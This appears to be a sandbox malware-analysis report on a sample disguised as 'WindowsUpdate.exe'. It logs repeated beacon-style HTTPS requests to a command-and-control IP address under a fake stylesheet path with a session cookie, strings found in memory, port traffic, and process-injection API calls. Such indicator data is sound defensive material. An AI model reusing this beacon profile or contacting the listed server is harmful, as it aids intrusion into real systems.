Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2797073037.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2869526732.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279686684.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2651126705.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2724275158.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/
Source: WindowsUpdate.exe, 00000000.00000003.2579208487.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.000002176FFBE000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279771257.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.000002176FFBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/#
Source: WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/0Z
Source: WindowsUpdate.exe, 00000000.00000003.2797073037.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2869526732.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/56.219.146/assets/code-3d7b701fc6eb.css
Source: WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/56.219.146/assets/code-3d7b701fc6eb.cssC4
Source: WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977365661.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2797073037.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428004046.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977631752.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2504988794.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977511740.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2651126705.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2797073037.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279750275.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2869526732.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279686684.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css
Source: WindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756607896.000002177003F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css011b87bd06
Source: WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770042000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css011b87bd06F
Source: WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756607896.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css2J
Source: WindowsUpdate.exe, 00000000.00000003.2204758414.0000021770044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css3A
Source: WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css6J
Source: WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css:
Source: WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssC4
Source: WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2724275158.0000021770010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssJ4
Source: WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssJJ
Source: WindowsUpdate.exe, 00000000.00000003.1832387451.0000021770010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssZ-
Source: WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428004046.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2504988794.0000021770010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssf4
Source: WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2797073037.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428004046.0000021770042000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssgA
Source: WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssq4
Source: WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279750275.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssr
Source: WindowsUpdate.exe, 00000000.00000003.2651126705.000002177003F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssr3A
Source: WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770042000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssrgA
Source: WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977631752.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2504988794.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977511740.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2651126705.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2797073037.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279750275.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428004046.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977365661.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2869526732.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204758414.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2724275158.000002177003F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssvJ
Source: WindowsUpdate.exe, 00000000.00000003.2279750275.0000021770044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.cssz
Source: WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756607896.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/assets/code-3d7b701fc6eb.css~J
Source: WindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756607896.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/fJ
Source: WindowsUpdate.exe, 00000000.00000003.2579208487.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.000002176FFBE000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279771257.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.000002176FFBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/g
Source: WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2504988794.0000021770010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/p
Source: WindowsUpdate.exe, 00000000.00000003.2428004046.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/r
Source: WindowsUpdate.exe, 00000000.00000003.2579208487.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.000002176FFBE000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279771257.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.000002176FFBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/res/js/jquery-3.6.2.slim.min.js
Source: WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/res/js/jquery-3.6.2.slim.min.jsG
Source: WindowsUpdate.exe, 00000000.00000003.2579208487.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.000002176FFBE000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279771257.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.000002176FFBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/res/js/jquery-3.6.2.slim.min.jsw
Source: WindowsUpdate.exe, 00000000.00000003.2869526732.0000021770010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/ssets/code-3d7b701fc6eb.cssC4
Source: WindowsUpdate.exe, 00000000.00000003.2279686684.0000021770010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://146.56.219.146/ssets/code-3d7b701fc6eb.cssq4
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownHTTPS traffic detected: 146.56.219.146:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00007FF7300A1190 NtCreateThreadEx,NtQueueApcThread,NtResumeThread,NtProtectVirtualMemory,NtProtectVirtualMemory,0_2_00007FF7300A1190
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D5FB00_2_00000217700D5FB0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700BA0900_2_00000217700BA090
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700CB1E00_2_00000217700CB1E0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D82000_2_00000217700D8200
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700B52D00_2_00000217700B52D0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D76A00_2_00000217700D76A0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700BE3500_2_00000217700BE350
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D63600_2_00000217700D6360
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D33700_2_00000217700D3370
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700EF3A80_2_00000217700EF3A8
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700B63F00_2_00000217700B63F0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D848B0_2_00000217700D848B
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D76B00_2_00000217700D76B0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700B95000_2_00000217700B9500
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700B65700_2_00000217700B6570
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D856F0_2_00000217700D856F
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D46600_2_00000217700D4660
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D86580_2_00000217700D8658
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D76C00_2_00000217700D76C0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700B57000_2_00000217700B5700
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700DE6F80_2_00000217700DE6F8
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700C77A00_2_00000217700C77A0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D47E00_2_00000217700D47E0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700CF8200_2_00000217700CF820
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D88970_2_00000217700D8897
